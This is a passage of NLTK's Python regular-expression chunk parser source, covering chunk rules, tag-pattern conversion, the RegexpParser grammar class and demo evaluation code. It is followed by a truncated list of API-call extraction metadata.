:type tag_pattern: str
:param tag_pattern: This rule's tag pattern. When
applied to a ``ChunkString``, this rule will
find any complete chunk that matches this tag pattern,
and un-chunk it.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
self._pattern = tag_pattern
regexp = re.compile(r"\{(?P<chunk>%s)\}" % tag_pattern2re_pattern(tag_pattern))
RegexpChunkRule.__init__(self, regexp, r"\g<chunk>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<UnChunkRule: '<IN|VB.*>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<UnChunkRule: " + repr(self._pattern) + ">"
class MergeRule(RegexpChunkRule):
"""
A rule specifying how to merge chunks in a ``ChunkString``, using
two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk whose end
matches left pattern, and immediately followed by a chunk whose
beginning matches right pattern. It will then merge those two
chunks into a single chunk.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``MergeRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
``left_tag_pattern``, and immediately followed by a chunk
whose beginning matches this pattern. It will
then merge those two chunks into a single chunk.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
this pattern, and immediately followed by a chunk
whose beginning matches ``right_tag_pattern``. It will
then merge those two chunks into a single chunk.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
"(?P<left>%s)}{(?=%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<MergeRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<MergeRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class SplitRule(RegexpChunkRule):
"""
A rule specifying how to split chunks in a ``ChunkString``, using
two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk that
matches the left pattern followed by the right pattern. It will
then split the chunk into two new chunks, at the point between the
two pattern matches.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``SplitRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this rule will
find any chunk containing a substring that matches
``left_tag_pattern`` followed by this pattern. It will
then split the chunk into two new chunks at the point
between these two matching patterns.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this rule will
find any chunk containing a substring that matches this
pattern followed by ``right_tag_pattern``. It will then
split the chunk into two new chunks at the point between
these two matching patterns.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
"(?P<left>%s)(?=%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>}{", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<SplitRule: '<NN>', '<DT>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<SplitRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ExpandLeftRule(RegexpChunkRule):
"""
A rule specifying how to expand chunks in a ``ChunkString`` to the left,
using two matching tag patterns: a left pattern, and a right pattern.
When applied to a ``ChunkString``, it will find any chunk whose beginning
matches right pattern, and immediately preceded by a strip whose
end matches left pattern. It will then expand the chunk to incorporate
the new material on the left.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``ExpandRightRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose beginning matches
``right_tag_pattern``, and immediately preceded by a strip
whose end matches this pattern. It will
then merge those two chunks into a single chunk.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose beginning matches
this pattern, and immediately preceded by a strip
whose end matches ``left_tag_pattern``. It will
then expand the chunk to incorporate the new material on the left.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
r"(?P<left>%s)\{(?P<right>%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"{\g<left>\g<right>", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ExpandLeftRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<ExpandLeftRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ExpandRightRule(RegexpChunkRule):
"""
A rule specifying how to expand chunks in a ``ChunkString`` to the
right, using two matching tag patterns: a left pattern, and a
right pattern. When applied to a ``ChunkString``, it will find any
chunk whose end matches left pattern, and immediately followed by
a strip whose beginning matches right pattern. It will then
expand the chunk to incorporate the new material on the right.
"""
def __init__(self, left_tag_pattern, right_tag_pattern, descr):
"""
Construct a new ``ExpandRightRule``.
:type right_tag_pattern: str
:param right_tag_pattern: This rule's right tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
``left_tag_pattern``, and immediately followed by a strip
whose beginning matches this pattern. It will
then merge those two chunks into a single chunk.
:type left_tag_pattern: str
:param left_tag_pattern: This rule's left tag
pattern. When applied to a ``ChunkString``, this
rule will find any chunk whose end matches
this pattern, and immediately followed by a strip
whose beginning matches ``right_tag_pattern``. It will
then expand the chunk to incorporate the new material on the right.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_tag_pattern))
re.compile(tag_pattern2re_pattern(right_tag_pattern))
self._left_tag_pattern = left_tag_pattern
self._right_tag_pattern = right_tag_pattern
regexp = re.compile(
r"(?P<left>%s)\}(?P<right>%s)"
% (
tag_pattern2re_pattern(left_tag_pattern),
tag_pattern2re_pattern(right_tag_pattern),
)
)
RegexpChunkRule.__init__(self, regexp, r"\g<left>\g<right>}", descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ExpandRightRule: '<NN|DT|JJ>', '<NN|JJ>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return (
"<ExpandRightRule: "
+ repr(self._left_tag_pattern)
+ ", "
+ repr(self._right_tag_pattern)
+ ">"
)
class ChunkRuleWithContext(RegexpChunkRule):
"""
A rule specifying how to add chunks to a ``ChunkString``, using
three matching tag patterns: one for the left context, one for the
chunk, and one for the right context. When applied to a
``ChunkString``, it will find any substring that matches the chunk
tag pattern, is surrounded by substrings that match the two
context patterns, and is not already part of a chunk; and create a
new chunk containing the substring that matched the chunk tag
pattern.
Caveat: Both the left and right context are consumed when this
rule matches; therefore, if you need to find overlapping matches,
you will need to apply your rule more than once.
"""
def __init__(
self,
left_context_tag_pattern,
chunk_tag_pattern,
right_context_tag_pattern,
descr,
):
"""
Construct a new ``ChunkRuleWithContext``.
:type left_context_tag_pattern: str
:param left_context_tag_pattern: A tag pattern that must match
the left context of ``chunk_tag_pattern`` for this rule to
apply.
:type chunk_tag_pattern: str
:param chunk_tag_pattern: A tag pattern that must match for this
rule to apply. If the rule does apply, then this pattern
also identifies the substring that will be made into a chunk.
:type right_context_tag_pattern: str
:param right_context_tag_pattern: A tag pattern that must match
the right context of ``chunk_tag_pattern`` for this rule to
apply.
:type descr: str
:param descr: A short description of the purpose and/or effect
of this rule.
"""
# Ensure that the individual patterns are coherent. E.g., if
# left='(' and right=')', then this will raise an exception:
re.compile(tag_pattern2re_pattern(left_context_tag_pattern))
re.compile(tag_pattern2re_pattern(chunk_tag_pattern))
re.compile(tag_pattern2re_pattern(right_context_tag_pattern))
self._left_context_tag_pattern = left_context_tag_pattern
self._chunk_tag_pattern = chunk_tag_pattern
self._right_context_tag_pattern = right_context_tag_pattern
regexp = re.compile(
"(?P<left>%s)(?P<chunk>%s)(?P<right>%s)%s"
% (
tag_pattern2re_pattern(left_context_tag_pattern),
tag_pattern2re_pattern(chunk_tag_pattern),
tag_pattern2re_pattern(right_context_tag_pattern),
ChunkString.IN_STRIP_PATTERN,
)
)
replacement = r"\g<left>{\g<chunk>}\g<right>"
RegexpChunkRule.__init__(self, regexp, replacement, descr)
def __repr__(self):
"""
Return a string representation of this rule. It has the form::
<ChunkRuleWithContext: '<IN>', '<NN>', '<DT>'>
Note that this representation does not include the
description string; that string can be accessed
separately with the ``descr()`` method.
:rtype: str
"""
return "<ChunkRuleWithContext: {!r}, {!r}, {!r}>".format(
self._left_context_tag_pattern,
self._chunk_tag_pattern,
self._right_context_tag_pattern,
)
# //////////////////////////////////////////////////////
# Tag Pattern Format Conversion
# //////////////////////////////////////////////////////
# this should probably be made more strict than it is -- e.g., it
# currently accepts 'foo'.
CHUNK_TAG_PATTERN = re.compile(
r"^(({}|<{}>)*)$".format(r"([^\{\}<>]|\{\d+,?\}|\{\d*,\d+\})+", r"[^\{\}<>]+")
)
def tag_pattern2re_pattern(tag_pattern):
"""
Convert a tag pattern to a regular expression pattern. A "tag
pattern" is a modified version of a regular expression, designed
for matching sequences of tags. The differences between regular
expression patterns and tag patterns are:
- In tag patterns, ``'<'`` and ``'>'`` act as parentheses; so
``'<NN>+'`` matches one or more repetitions of ``'<NN>'``, not
``'<NN'`` followed by one or more repetitions of ``'>'``.
- Whitespace in tag patterns is ignored. So
``'<DT> | <NN>'`` is equivalent to ``'<DT>|<NN>'``
- In tag patterns, ``'.'`` is equivalent to ``'[^{}<>]'``; so
``'<NN.*>'`` matches any single tag starting with ``'NN'``.
In particular, ``tag_pattern2re_pattern`` performs the following
transformations on the given pattern:
- Replace '.' with '[^<>{}]'
- Remove any whitespace
- Add extra parens around '<' and '>', to make '<' and '>' act
like parentheses. E.g., so that in '<NN>+', the '+' has scope
over the entire '<NN>'; and so that in '<NN|IN>', the '|' has
scope over 'NN' and 'IN', but not '<' or '>'.
- Check to make sure the resulting pattern is valid.
:type tag_pattern: str
:param tag_pattern: The tag pattern to convert to a regular
expression pattern.
:raise ValueError: If ``tag_pattern`` is not a valid tag pattern.
In particular, ``tag_pattern`` should not include braces; and it
should not contain nested or mismatched angle-brackets.
:rtype: str
:return: A regular expression pattern corresponding to
``tag_pattern``.
"""
# Clean up the regular expression
tag_pattern = re.sub(r"\s", "", tag_pattern)
tag_pattern = re.sub(r"<", "(<(", tag_pattern)
tag_pattern = re.sub(r">", ")>)", tag_pattern)
# Check the regular expression
if not CHUNK_TAG_PATTERN.match(tag_pattern):
raise ValueError("Bad tag pattern: %r" % tag_pattern)
# Replace "." with CHUNK_TAG_CHAR.
# We have to do this after, since it adds {}[]<>s, which would
# confuse CHUNK_TAG_PATTERN.
# PRE doesn't have lookback assertions, so reverse twice, and do
# the pattern backwards (with lookahead assertions). This can be
# made much cleaner once we can switch back to SRE.
def reverse_str(str):
lst = list(str)
lst.reverse()
return "".join(lst)
tc_rev = reverse_str(ChunkString.CHUNK_TAG_CHAR)
reversed = reverse_str(tag_pattern)
reversed = re.sub(r"\.(?!\\(\\\\)*($|[^\\]))", tc_rev, reversed)
tag_pattern = reverse_str(reversed)
return tag_pattern
# //////////////////////////////////////////////////////
# RegexpChunkParser
# //////////////////////////////////////////////////////
class RegexpChunkParser(ChunkParserI):
"""
A regular expression based chunk parser. ``RegexpChunkParser`` uses a
sequence of "rules" to find chunks of a single type within a
text. The chunking of the text is encoded using a ``ChunkString``,
and each rule acts by modifying the chunking in the
``ChunkString``. The rules are all implemented using regular
expression matching and substitution.
The ``RegexpChunkRule`` class and its subclasses (``ChunkRule``,
``StripRule``, ``UnChunkRule``, ``MergeRule``, and ``SplitRule``)
define the rules that are used by ``RegexpChunkParser``. Each rule
defines an ``apply()`` method, which modifies the chunking encoded
by a given ``ChunkString``.
:type _rules: list(RegexpChunkRule)
:ivar _rules: The list of rules that should be applied to a text.
:type _trace: int
:ivar _trace: The default level of tracing.
"""
def __init__(self, rules, chunk_label="NP", root_label="S", trace=0):
"""
Construct a new ``RegexpChunkParser``.
:type rules: list(RegexpChunkRule)
:param rules: The sequence of rules that should be used to
generate the chunking for a tagged text.
:type chunk_label: str
:param chunk_label: The node value that should be used for
chunk subtrees. This is typically a short string
describing the type of information contained by the chunk,
such as ``"NP"`` for base noun phrases.
:type root_label: str
:param root_label: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
"""
self._rules = rules
self._trace = trace
self._chunk_label = chunk_label
self._root_label = root_label
def _trace_apply(self, chunkstr, verbose):
"""
Apply each rule of this ``RegexpChunkParser`` to ``chunkstr``, in
turn. Generate trace output between each rule. If ``verbose``
is true, then generate verbose output.
:type chunkstr: ChunkString
:param chunkstr: The chunk string to which each rule should be
applied.
:type verbose: bool
:param verbose: Whether output should be verbose.
:rtype: None
"""
print("# Input:")
print(chunkstr)
for rule in self._rules:
rule.apply(chunkstr)
if verbose:
print("#", rule.descr() + " (" + repr(rule) + "):")
else:
print("#", rule.descr() + ":")
print(chunkstr)
def _notrace_apply(self, chunkstr):
"""
Apply each rule of this ``RegexpChunkParser`` to ``chunkstr``, in
turn.
:param chunkstr: The chunk string to which each rule should be
applied.
:type chunkstr: ChunkString
:rtype: None
"""
for rule in self._rules:
rule.apply(chunkstr)
def parse(self, chunk_struct, trace=None):
"""
:type chunk_struct: Tree
:param chunk_struct: the chunk structure to be (further) chunked
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output. This value
overrides the trace level value that was given to the
constructor.
:rtype: Tree
:return: a chunk structure that encodes the chunks in a given
tagged sentence. A chunk is a non-overlapping linguistic
group, such as a noun phrase. The set of chunks
identified in the chunk structure depends on the rules
used to define this ``RegexpChunkParser``.
"""
if len(chunk_struct) == 0:
print("Warning: parsing empty text")
return Tree(self._root_label, [])
try:
chunk_struct.label()
except AttributeError:
chunk_struct = Tree(self._root_label, chunk_struct)
# Use the default trace value?
if trace is None:
trace = self._trace
chunkstr = ChunkString(chunk_struct)
# Apply the sequence of rules to the chunkstring.
if trace:
verbose = trace > 1
self._trace_apply(chunkstr, verbose)
else:
self._notrace_apply(chunkstr)
# Use the chunkstring to create a chunk structure.
return chunkstr.to_chunkstruct(self._chunk_label)
def rules(self):
"""
:return: the sequence of rules used by ``RegexpChunkParser``.
:rtype: list(RegexpChunkRule)
"""
return self._rules
def __repr__(self):
"""
:return: a concise string representation of this
``RegexpChunkParser``.
:rtype: str
"""
return "<RegexpChunkParser with %d rules>" % len(self._rules)
def __str__(self):
"""
:return: a verbose string representation of this ``RegexpChunkParser``.
:rtype: str
"""
s = "RegexpChunkParser with %d rules:\n" % len(self._rules)
margin = 0
for rule in self._rules:
margin = max(margin, len(rule.descr()))
if margin < 35:
format = " %" + repr(-(margin + 3)) + "s%s\n"
else:
format = " %s\n %s\n"
for rule in self._rules:
s += format % (rule.descr(), repr(rule))
return s[:-1]
# //////////////////////////////////////////////////////
# Chunk Grammar
# //////////////////////////////////////////////////////
class RegexpParser(ChunkParserI):
r"""
A grammar based chunk parser. ``chunk.RegexpParser`` uses a set of
regular expression patterns to specify the behavior of the parser.
The chunking of the text is encoded using a ``ChunkString``, and
each rule acts by modifying the chunking in the ``ChunkString``.
The rules are all implemented using regular expression matching
and substitution.
A grammar contains one or more clauses in the following form::
NP:
{<DT|JJ>} # chunk determiners and adjectives
}<[\.VI].*>+{ # strip any tag beginning with V, I, or .
<.*>}{<DT> # split a chunk at a determiner
<DT|JJ>{}<NN.*> # merge chunk ending with det/adj
# with one starting with a noun
The patterns of a clause are executed in order. An earlier
pattern may introduce a chunk boundary that prevents a later
pattern from executing. Sometimes an individual pattern will
match on multiple, overlapping extents of the input. As with
regular expression substitution more generally, the chunker will
identify the first match possible, then continue looking for matches
after this one has ended.
The clauses of a grammar are also executed in order. A cascaded
chunk parser is one having more than one clause. The maximum depth
of a parse tree created by this chunk parser is the same as the
number of clauses in the grammar.
When tracing is turned on, the comment portion of a line is displayed
each time the corresponding pattern is applied.
:type _start: str
:ivar _start: The start symbol of the grammar (the root node of
resulting trees)
:type _stages: int
:ivar _stages: The list of parsing stages corresponding to the grammar
"""
def __init__(self, grammar, root_label="S", loop=1, trace=0):
"""
Create a new chunk parser, from the given start state
and set of chunk patterns.
:param grammar: The grammar, or a list of RegexpChunkParser objects
:type grammar: str or list(RegexpChunkParser)
:param root_label: The top node of the tree being created
:type root_label: str or Nonterminal
:param loop: The number of times to run through the patterns
:type loop: int
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
"""
self._trace = trace
self._stages = []
self._grammar = grammar
self._loop = loop
if isinstance(grammar, str):
self._read_grammar(grammar, root_label, trace)
else:
# Make sur the grammar looks like it has the right type:
type_err = (
"Expected string or list of RegexpChunkParsers " "for the grammar."
)
try:
grammar = list(grammar)
except BaseException as e:
raise TypeError(type_err) from e
for elt in grammar:
if not isinstance(elt, RegexpChunkParser):
raise TypeError(type_err)
self._stages = grammar
def _read_grammar(self, grammar, root_label, trace):
"""
Helper function for __init__: read the grammar if it is a
string.
"""
rules = []
lhs = None
for line in grammar.split("\n"):
line = line.strip()
# New stage begins if there's an unescaped ':'
m = re.match("(?P<nonterminal>(\\.|[^:])*)(:(?P<rule>.*))", line)
if m:
# Record the stage that we just completed.
self._add_stage(rules, lhs, root_label, trace)
# Start a new stage.
lhs = m.group("nonterminal").strip()
rules = []
line = m.group("rule").strip()
# Skip blank & comment-only lines
if line == "" or line.startswith("#"):
continue
# Add the rule
rules.append(RegexpChunkRule.fromstring(line))
# Record the final stage
self._add_stage(rules, lhs, root_label, trace)
def _add_stage(self, rules, lhs, root_label, trace):
"""
Helper function for __init__: add a new stage to the parser.
"""
if rules != []:
if not lhs:
raise ValueError("Expected stage marker (eg NP:)")
parser = RegexpChunkParser(
rules, chunk_label=lhs, root_label=root_label, trace=trace
)
self._stages.append(parser)
def parse(self, chunk_struct, trace=None):
"""
Apply the chunk parser to this input.
:type chunk_struct: Tree
:param chunk_struct: the chunk structure to be (further) chunked
(this tree is modified, and is also returned)
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output. This value
overrides the trace level value that was given to the
constructor.
:return: the chunked output.
:rtype: Tree
"""
if trace is None:
trace = self._trace
for i in range(self._loop):
for parser in self._stages:
chunk_struct = parser.parse(chunk_struct, trace=trace)
return chunk_struct
def __repr__(self):
"""
:return: a concise string representation of this ``chunk.RegexpParser``.
:rtype: str
"""
return "<chunk.RegexpParser with %d stages>" % len(self._stages)
def __str__(self):
"""
:return: a verbose string representation of this
``RegexpParser``.
:rtype: str
"""
s = "chunk.RegexpParser with %d stages:\n" % len(self._stages)
margin = 0
for parser in self._stages:
s += "%s\n" % parser
return s[:-1]
# //////////////////////////////////////////////////////
# Demonstration code
# //////////////////////////////////////////////////////
def demo_eval(chunkparser, text):
"""
Demonstration code for evaluating a chunk parser, using a
``ChunkScore``. This function assumes that ``text`` contains one
sentence per line, and that each sentence has the form expected by
``tree.chunk``. It runs the given chunk parser on each sentence in
the text, and scores the result. It prints the final score
(precision, recall, and f-measure); and reports the set of chunks
that were missed and the set of chunks that were incorrect. (At
most 10 missing chunks and 10 incorrect chunks are reported).
:param chunkparser: The chunkparser to be tested
:type chunkparser: ChunkParserI
:param text: The chunked tagged text that should be used for
evaluation.
:type text: str
"""
from nltk import chunk
from nltk.tree import Tree
# Evaluate our chunk parser.
chunkscore = chunk.ChunkScore()
for sentence in text.split("\n"):
print(sentence)
sentence = sentence.strip()
if not sentence:
continue
gold = chunk.tagstr2tree(sentence)
tokens = gold.leaves()
test = chunkparser.parse(Tree("S", tokens), trace=1)
chunkscore.score(gold, test)
print()
print("/" + ("=" * 75) + "\\")
print("Scoring", chunkparser)
print("-" * 77)
print("Precision: %5.1f%%" % (chunkscore.precision() * 100), " " * 4, end=" ")
print("Recall: %5.1f%%" % (chunkscore.recall() * 100), " " * 6, end=" ")
print("F-Measure: %5.1f%%" % (chunkscore.f_measure() * 100))
# Missed chunks.
if chunkscore.missed():
print("Missed:")
missed = chunkscore.missed()
for chunk in missed[:10]:
print(" ", " ".join(map(str, chunk)))
if len(chunkscore.missed()) > 10:
print(" ...")
# Incorrect chunks.
if chunkscore.incorrect():
print("Incorrect:")
incorrect = chunkscore.incorrect()
for chunk in incorrect[:10]:
print(" ", " ".join(map(str, chunk)))
if len(chunkscore.incorrect()) > 10:
print(" ...")
print("\\" + ("=" * 75) + "/")
print()
def demo():
"""
A demonstration for the ``RegexpChunkParser`` class. A single text is
parsed with four different chunk parsers, using a variety of rules
and strategies.
"""
from nltk import Tree, chunk
text = """\
[ the/DT little/JJ cat/NN ] sat/VBD on/IN [ the/DT mat/NN ] ./.
[ John/NNP ] saw/VBD [the/DT cats/NNS] [the/DT dog/NN] chased/VBD ./.
[ John/NNP ] thinks/VBZ [ Mary/NN ] saw/VBD [ the/DT cat/NN ] sit/VB on/IN [ the/DT mat/NN ]./.
"""
print("*" * 75)
print("Evaluation text:")
print(text)
print("*" * 75)
print()
grammar = r"""
NP: # NP stage
{<DT>?<JJ>*<NN>} # chunk determiners, adjectives and nouns
{<NNP>+} # chunk proper nouns
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP:
{<.*>} # start by chunking each tag
}<[\.VI].*>+{ # unchunk any verbs, prepositions or periods
<DT|JJ>{}<NN.*> # merge det/adj with nouns
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP: {<DT>?<JJ>*<NN>} # chunk determiners, adjectives and nouns
VP: {<TO>?<VB.*>} # VP = verb words
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
grammar = r"""
NP: {<.*>*} # start by chunking everything
}<[\.VI].*>+{ # strip any verbs, prepositions or periods
<.*>}{<DT> # separate on determiners
PP: {<IN><NP>} # PP = preposition + noun phrase
VP: {<VB.*><NP|PP>*} # VP = verb words + NPs and PPs
"""
cp = chunk.RegexpParser(grammar)
demo_eval(cp, text)
# Evaluation
from nltk.corpus import conll2000
print()
print("Demonstration of empty grammar:")
cp = chunk.RegexpParser("")
print(chunk.accuracy(cp, conll2000.chunked_sents("test.txt", chunk_types=("NP",))))
print()
print("Demonstration of accuracy evaluation using CoNLL tags:")
grammar = r"""
NP:
{<.*>} # start by chunking each tag
}<[\.VI].*>+{ # unchunk any verbs, prepositions or periods
<DT|JJ>{}<NN.*> # merge det/adj with nouns
"""
cp = chunk.RegexpParser(grammar)
print(chunk.accuracy(cp, conll2000.chunked_sents("test.txt")[:5]))
print()
print("Demonstration of tagged token input")
grammar = r"""
NP: {<.*>*} # start by chunking everything
}<[\.VI].*>+{ # strip any verbs, prepositions or periods
<.*>}{<DT> # separate on determiners
PP: {<IN><NP>} # PP = preposition + noun phrase
VP: {<VB.*><NP|PP>*} # VP = verb words + NPs and PPs
"""
cp = chunk.RegexpParser(grammar)
print(
cp.parse(
[
("the", "DT"),
("little", "JJ"),
("cat", "NN"),
("sat", "VBD"),
("on", "IN"),
("the", "DT"),
("mat", "NN"),
(".", "."),
]
)
)
if __name__ == "__main__":
demo()
|
[
"nltk.Tree",
"re.split",
"nltk.chunk.tagstr2tree",
"re.match",
"nltk.corpus.conll2000.chunked_sents",
"nltk.chunk.ChunkScore",
"nltk.chunk.RegexpParser",
"re.sub",
"re.compile"
] |
[((2382, 2424), 're.compile', 're.compile', (["('^(\\\\{?%s\\\\}?)*?$' % CHUNK_TAG)"], {}), "('^(\\\\{?%s\\\\}?)*?$' % CHUNK_TAG)\n", (2392, 2424), False, 'import re\n'), ((2440, 2464), 're.compile', 're.compile', (['"""[^\\\\{\\\\}]+"""'], {}), "('[^\\\\{\\\\}]+')\n", (2450, 2464), False, 'import re\n'), ((2489, 2513), 're.compile', 're.compile', (['"""(\\\\{\\\\})*$"""'], {}), "('(\\\\{\\\\})*$')\n", (2499, 2513), False, 'import re\n'), ((35514, 35544), 're.sub', 're.sub', (['"""\\\\s"""', '""""""', 'tag_pattern'], {}), "('\\\\s', '', tag_pattern)\n", (35520, 35544), False, 'import re\n'), ((35563, 35594), 're.sub', 're.sub', (['"""<"""', '"""(<("""', 'tag_pattern'], {}), "('<', '(<(', tag_pattern)\n", (35569, 35594), False, 'import re\n'), ((35614, 35645), 're.sub', 're.sub', (['""">"""', '""")>)"""', 'tag_pattern'], {}), "('>', ')>)', tag_pattern)\n", (35620, 35645), False, 'import re\n'), ((36338, 36399), 're.sub', 're.sub', (['"""\\\\.(?!\\\\\\\\(\\\\\\\\\\\\\\\\)*($|[^\\\\\\\\]))"""', 'tc_rev', 'reversed'], {}), "('\\\\.(?!\\\\\\\\(\\\\\\\\\\\\\\\\)*($|[^\\\\\\\\]))', tc_rev, reversed)\n", (36344, 36399), False, 'import re\n'), ((50006, 50024), 'nltk.chunk.ChunkScore', 'chunk.ChunkScore', ([], {}), '()\n', (50022, 50024), False, 'from nltk import Tree, chunk\n'), ((52059, 52086), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52077, 52086), False, 'from nltk import Tree, chunk\n'), ((52335, 52362), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52353, 52362), False, 'from nltk import Tree, chunk\n'), ((52540, 52567), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52558, 52567), False, 'from nltk import Tree, chunk\n'), ((52934, 52961), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (52952, 52961), False, 'from nltk import Tree, chunk\n'), ((53111, 53133), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['""""""'], {}), "('')\n", (53129, 53133), False, 'from nltk import Tree, chunk\n'), ((53527, 53554), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (53545, 53554), False, 'from nltk import Tree, chunk\n'), ((54030, 54057), 'nltk.chunk.RegexpParser', 'chunk.RegexpParser', (['grammar'], {}), '(grammar)\n', (54048, 54057), False, 'from nltk import Tree, chunk\n'), ((6198, 6225), 're.split', 're.split', (['"""[{}]"""', 'self._str'], {}), "('[{}]', self._str)\n", (6206, 6225), False, 'import re\n'), ((6731, 6761), 'nltk.Tree', 'Tree', (['self._root_label', 'pieces'], {}), '(self._root_label, pieces)\n', (6735, 6761), False, 'from nltk import Tree, chunk\n'), ((7958, 7989), 're.sub', 're.sub', (['regexp', 'repl', 'self._str'], {}), '(regexp, repl, self._str)\n', (7964, 7989), False, 'import re\n'), ((8183, 8206), 're.sub', 're.sub', (['"""\\\\{\\\\}"""', '""""""', 's'], {}), "('\\\\{\\\\}', '', s)\n", (8189, 8206), False, 'import re\n'), ((9071, 9106), 're.sub', 're.sub', (['""">(?!\\\\})"""', '"""> """', 'self._str'], {}), "('>(?!\\\\})', '> ', self._str)\n", (9077, 9106), False, 'import re\n'), ((9122, 9155), 're.sub', 're.sub', (['"""([^\\\\{])<"""', '"""\\\\1 <"""', 'str'], {}), "('([^\\\\{])<', '\\\\1 <', str)\n", (9128, 9155), False, 'import re\n'), ((13595, 13650), 're.match', 're.match', (['"""(?P<rule>(\\\\\\\\.|[^#])*)(?P<comment>#.*)?"""', 's'], {}), "('(?P<rule>(\\\\\\\\.|[^#])*)(?P<comment>#.*)?', s)\n", (13603, 13650), False, 'import re\n'), ((50185, 50212), 'nltk.chunk.tagstr2tree', 'chunk.tagstr2tree', (['sentence'], {}), '(sentence)\n', (50202, 50212), False, 'from nltk import Tree, chunk\n'), ((5474, 5500), 're.split', 're.split', (['"""[\\\\{\\\\}<>]+"""', 's'], {}), "('[\\\\{\\\\}<>]+', s)\n", (5482, 5500), False, 'import re\n'), ((11503, 11521), 're.compile', 're.compile', (['regexp'], {}), '(regexp)\n', (11513, 11521), False, 'import re\n'), ((40866, 40892), 'nltk.Tree', 'Tree', 